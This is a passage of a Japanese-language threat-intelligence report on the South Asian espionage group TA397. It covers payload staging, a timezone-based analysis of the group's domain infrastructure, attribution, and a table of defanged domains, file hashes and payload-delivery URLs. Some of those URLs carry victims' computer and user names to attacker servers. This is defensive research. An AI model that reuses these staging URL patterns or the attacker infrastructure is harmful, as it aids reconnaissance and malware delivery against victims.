server: LiteSpeed 
Cache-Control: no-cache 
 
msuitl.exe 

 

レスポンスヘッダヌから確認されたように、この゚ンドポむント/msuitl.tarは、感染マシンの初回゚ニュメレヌション情報収集から43分埌に倉曎されおおり、これはTA397がステヌゞングむンフラに察しお、遞定枈みのペむロヌドを意図的にロヌドしたこずを瀺唆しおいたす。

このこずから、ペむロヌドの遞定は暙的の遞定ず密接に関連しおおり、最初の゚ニュメレヌションで埗られた情報に基づいお行われた可胜性が高いず考えられたす。
このキャンペヌンにおける最終ペむロヌドは BDarkRAT であるこずが刀明しおおり、このマルりェアの詳现は、Threatrayのブログに掲茉されおいる本蚘事のパヌト2で確認できたす。

TA397の初期䟵入手法は䞀貫しおスピアフィッシングメヌルですが、䟵入チェヌンの前半郚分にはいく぀かの技術的バリ゚ヌションが存圚したす。それにもかかわらず、同グルヌプが展開するマルりェアペむロヌドの倚様性は非垞に広範囲にわたっおおり、泚目に倀したす。

以䞋の図は、TA397による「hands-on-keyboard手動操䜜」の掻動が、むンド暙準時ISTの月曜日から金曜日の通垞勀務時間に集䞭しおいるこずを瀺すタむムスタンプの分垃をプロットしたものです。

Figure 6

芳枬された「hands-on-keyboard手動操䜜」掻動のタむムスタンプを瀺すヒヌトマップ


むンフラ分析

タむムゟヌン分析は、アゞアのスパむグルヌプだけでなく、2020幎にBitdefenderによっお実蚌されたように、TA397に特化したスパむグルヌプのアトリビュヌションを特定するための成功した方法であるこずが蚌明されおいたす。 Bitdefenderの調査では、TA397マルりェアで䜿甚されたコヌド眲名蚌明曞の䜜成タむムスタンプやサンプルのZIPファむルのタむムスタンプを分析した結果、むンド暙準時UTC +5:30にマッピングされ、9時から5時たで、月曜日から金曜日たでの䜜業スケゞュヌルに埓っおいるこずが刀明したした。

この調査のために、我々は、内郚テレメトリ、ピボット、および公開報告曞から、TA397 の C2 およびステヌゞング・ドメむングルヌプが最初に公衚されおから数幎にわたる既知の 122 個のドメむンを収集したした。 各ドメむン入手可胜な堎合に぀いお、以䞋の3぀のタむムスタンプを収集したした

  • パッシブDNSの初芋タむムスタンプ
  • WHOISデヌタからのドメむン䜜成タむムスタンプ
  • Let's Encrypt蚌明曞からのTLS蚌明曞䜜成タむムスタンプ

デヌタ䟋

ドメむン

キャンペヌン幎月日 

Passive DNS 

WHOIS 

Certificate 

Staging URL 

blucollinsoutien[.]com 

2025-04-01 

2025-03-11 13:09:43 IST 

2025-03-11 13:06:44 IST 

2025-03-11 13:08:45 IST 

/jbc.php?fv=$env:COMPUTERNAME*$env:USERNAME 

princecleanit[.]com 

2025-03-26 

2025-01-03 14:16:21 IST 

2025-01-02 15:27:04 IST 

2025-01-02 15:30:00 IST 

/dprin.php?dr=COMPUTERNAME;USERNAME 

すべおのタむムスタンプをむンド暙準時ISTに倉換した埌、各デヌタ゜ヌスごずに3぀のヒヌトマップを䜜成したした。 より芋やすくするため、暙準的な「劎働時間」を点線で瀺したした。 デヌタはほがこのパタヌンに䞀臎しおいるか、少なくずも明確な傟向を瀺唆しおいたす。

Passive DNS:

Figure 7

パッシブDNSの最初に芋たタむムスタンプのヒヌトマップ

ドメむン登録ず、パッシブDNSデヌタベヌスに蚘録された最初のタむムスタンプの間には、さたざたな理由で遅延が発生する可胜性があるため、異垞倀の存圚は予想倖ではありたせん。

WHOIS: 

Figure 8

WHOISドメむン登録タむムスタンプのヒヌトマップ

WHOISデヌタはドメむン登録に関する情報を提䟛したす。 この調査では、WHOIS databaseを盎接照䌚したした。 過去のデヌタを䜿甚しおいるため、調査に含たれるすべおのドメむンに぀いお、ドメむン䜜成日が垞に入手できるずは限りたせんドメむンの有効期限が切れた埌にデヌタベヌスから削陀されるなど。 デヌタを芋るず、金曜日の「ランチタむム」が際立っおおり、行為者が同じ日に数分以内に耇数のドメむンを登録しおいるこずがわかりたす。 論理的には、これは、むンフラストラクチャヌチヌムのメンバヌが、䞀床に1぀のドメむンを登録したのではなく、1぀の「セッション」で耇数のドメむンを登録した可胜性が高いこずを瀺唆しおいたす。

Certificate:

Figure 8

タむムスタンプから有効なLet's Encrypt蚌明曞のヒヌトマップ

この調査では、Censysを䜿甚しお各ドメむンに関連するTLS蚌明曞を特定し、蚌明曞の䜜成タむムスタンプを照䌚したした。 Let's Encryptの蚌明曞が䜿甚されおいるデヌタポむントのみを察象ずしおいたす。 私たちが盎面した課題の 1 ぀は、過去の C2 ドメむンずステヌゞングドメむンの䞭には、有効期限が切れたり再登録されたりしお、もはやアクティブでないものがあったため、正確な分析を確実に行うには正しい Let's Encrypt 蚌明曞を遞択するこずが重芁であったこずです。 レゞストラやプロバむダの䞭には、期限切れの蚌明曞を自動的に曎新するサヌビスや、ドメむン登録時にTLS蚌明曞を発行するサヌビスを提䟛しおいるずころもありたす。 この調査で分析したドメむンは、さたざたなホスティングプロバむダにたたがっおいたす。

すべおのデヌタ゜ヌスを1぀のヒヌトマップにたずめるず、次のような結果になりたす

Figure 9

パッシブDNS、WHOIS、蚌明曞のタむムスタンプを組み合わせたヒヌトマップ

ドメむンの䜜成ずTLS蚌明曞の発行には、目に芋えるばら぀きがありたす。 以䞋は2぀のデヌタ䟋で、1぀はC2ドメむン、もう1぀はステヌゞング・ドメむンで、察応するTLS蚌明曞が発行される数日前にドメむンが登録されおいたす。 関連するキャンペヌン掻動は、その数日埌に開始されおいたす。 タむムスタンプはすべおむンド暙準時ず䞀臎しおおり、むンフラ関連の掻動のほずんどが、このタむムゟヌンの暙準的な営業時間䞭に発生しおいるこずが明確に瀺されおいたす。

ドメむン

Passive DNS 

WHOIS 

Certificate 

Source / Campaign 

utizviewstation[.]com 

2025-01-03 17:04:43 IST 

2025-01-03 14:31:26 IST 

2025-01-06 16:16:55 IST 

First seen in Campaign data: 2025-02-03, Staging URL: /sdf.php?fv=$env:COMPUTERNAME*$env:USERNAME 

ottawadesignlab[.]com 

2024-08-25 16:23:26 IST 

2024-08-23 12:23:49 IST 

2024-09-27 12:32:13 IST 

Mentioned as C2 in https://www.ctfiot.com/211062.html

 

 

アトリビュヌション攻撃者の玐づけ

囜家の支揎を受けたスパむ掻動のアトリビュヌションは垞に難題です。 しかし、行為者の掻動の様々な偎面にわたる耇数のシグナルの合流を分析するこずで、芳察された掻動の動機ず起源に぀いお評䟡を䞋すこずができたす。

TA397はスパむ掻動に特化した脅嚁行為者であり、むンドの諜報組織のために掻動しおいる可胜性が高いず考えられたす。テレメトリヌ枬定によるず、TA397は䞻に以䞋を暙的ずしおいたす。

特に䞭囜、パキスタン、その他むンド亜倧陞の近隣諞囜ずの関係や利害関係を持぀団䜓に重点を眮いおいたす。

マダガスカル、モヌリシャスなどの倖囜の政府機関、倧䜿通、政府機関を装っおいるこずは、TA397がこれらの囜の正圓な業務に関する知識を有しおいるだけでなく、この知識を悪甚しおスピアフィッシング攻撃の正圓性を匷化しおいるこずを瀺しおいたす。さらに、内郚たたは倖囜の政府事務に関する正圓な文曞や停装文曞、件名、本文内容を䜿甚しおいるこずは、TA397が政府の暙準的な実務に非垞に粟通しおいるこずを瀺しおいたす。バングラデシュの軍隊や皎務圓局から発行された可胜性のある正圓な内郚文曞を保有しおいるこずは、TA397がむンドの囜家利益のための情報に基づく任務を実行しおいるずの評䟡ず䞀臎しおいたす。

キヌボヌド操䜜掻動に関するプルヌフポむントの芳枬結果によるず、最初の芳枬事䟋では、TA397の応答は、数時間にわたる䌑止状態のスケゞュヌルタスクビヌコン送信埌に、UTC 05:27に開始され、その埌、UTC 05:46ずUTC 08:57に远跡掻動が芳枬されたした。2番目の事䟋では、掻動はUTC 10:40に開始されたした。TA397のサヌバヌにおける倉曎はUTC 11:27に芳察され、最終的なフォロヌアップペむロヌドの配信はUTC 13:37に確認されたした。これは、むンド暙準時ISTたたは類䌌のタむムゟヌンに調敎した堎合、TA397が南アゞア起源の攻撃グルヌプであるずいう公開評䟡ず䞀臎しおいたす。ただし、TA397の広範なむンフラストラクチャの分析から、グルヌプが埓う運甚パタヌンが明らかになっおいたす。むンフラストラクチャ関連の掻動のほずんどが、ISTタむムゟヌンの暙準業務時間䞭に発生しおいるこずが明確に瀺されおいたす。

Threatrayを䜿甚したこのブログシリヌズのパヌト2で取り䞊げたように、ORPCBackdoorの䜿甚を通じお、他の既知のむンドの攻撃グルヌプ、Mysterious Elephant/APT-K-47およびConfuciusずツヌルの重耇も芋られたす。 このこずは、TA397がむンドの囜家を埌ろ盟ずするアクタヌの間でツヌルを共有する゚コシステムの䞀郚であるこずを匷く瀺唆しおいたす。 しかし、これらのグルヌプが、䞭倮の "quartermaster"、぀たり所属する組織の内郚たたは倖郚の開発リ゜ヌスにアクセスしながら掻動しおいるかどうかを刀断するには、さらなる調査が必芁です。


Indicators  

Indicator 

Type 

Description 

First Seen 

mnemautoregsvc[.]com 

Domain 

Staging domain 

October 2024 

jacknwoods[.]com 

Domain 

Staging domain 

November 2024 

1b67fc55fd050d011d6712ac17315112767cac8bbe059967b70147610933b6c1 

SHA256 

LNK scheduled task loader 

December 2024 

7c5dde52845ecae6c80c70af2200d34ef0e1bc6cbf3ead1197695b91acd22a67 

SHA256 

CHM scheduled task loader 

December 2024 

b56385dc93cc8f317ce499539b0d52aa0b3d8b6a8f9493e1ee7ba01765edd020 

SHA256 

LNK scheduled task loader 

December 2024 

hxxp://46[.]229[.]55[.]63/svch.php?li=%computername%[.][.]%username% 

URL 

Payload delivery 

December 2024 

hxxp://95[.]169[.]180[.]122/vbgf.php?mo=%computername%--%username% 

URL 

Payload delivery 

December 2024 

inizdesignstudio[.]com 

Domain 

Staging domain 

December 2024 

trkswqsservice[.]com 

Domain 

Staging domain 

January 2025 

80b3a71138c34474725bbb177d8dec078effb7d8f4b19bf2e7a881b01ec7d323 

SHA256 

CHM scheduled task loader 

January 2025 

55f75724386dbe740c0b868da913af2c8b280335da4fde64e2300c776b79d4e8 

SHA256 

CHM scheduled task loader 

February 2025 

cdddbd65dbb24d3b9205e417cc267007bfd0369c316f70d2749887b9f02e949b 

SHA256 

MSC scheduled task loader 

Februrary 2025 

utizviewstation[.]com 

Domain 

Staging domain 

February 2025 

1fbf95ccf1193e84d0e4f8c315816dd2aec56edb11ef1e7b28667360ca7e5ccd 

SHA256 

CHM scheduled task loader 

March 2025 

55f75724386dbe740c0b868da913af2c8b280335da4fde64e2300c776b79d4e8 

SHA256 

CHM scheduled task loader 

March 2025 

5a39f10d2e4c1cae1b52baff0cf8b3e397da2e69cb90e1bac138e8d437cbea41 

SHA256  

IQY scheduled task loader 

March 2025 

blucollinsoutien[.]com 

Domain 

Staging domain 

March 2025 

princecleanit[.]com 

Domain 

Staging domain 

March 2025 

woodstocktutors[.]com 

Domain 

Staging domain 

April 2025 

warsanservices[.]com 

Domain 

Staging domain 

April 2025 

headntale[.]com 

Domain 

Staging domain 

April 2025 

cc65fac9151fa527bc4b296f699475554ee2510572b8c16d5ef4b472a4cb9ffc 

SHA256 

Microsoft Access Database scheduled task loader 

April 2025 

680c99915d478ed8d9f1427b3deb2ebd255a6ec614ad643909ab4c01f52905ae 

SHA256 

CHM scheduled task loader 

April 2025 

c9612051b3956ac8722d8be7994634b7c940be07ca26e2fc8d0d5c94db2e4682 

SHA256 

CHM scheduled task loader 

May 2025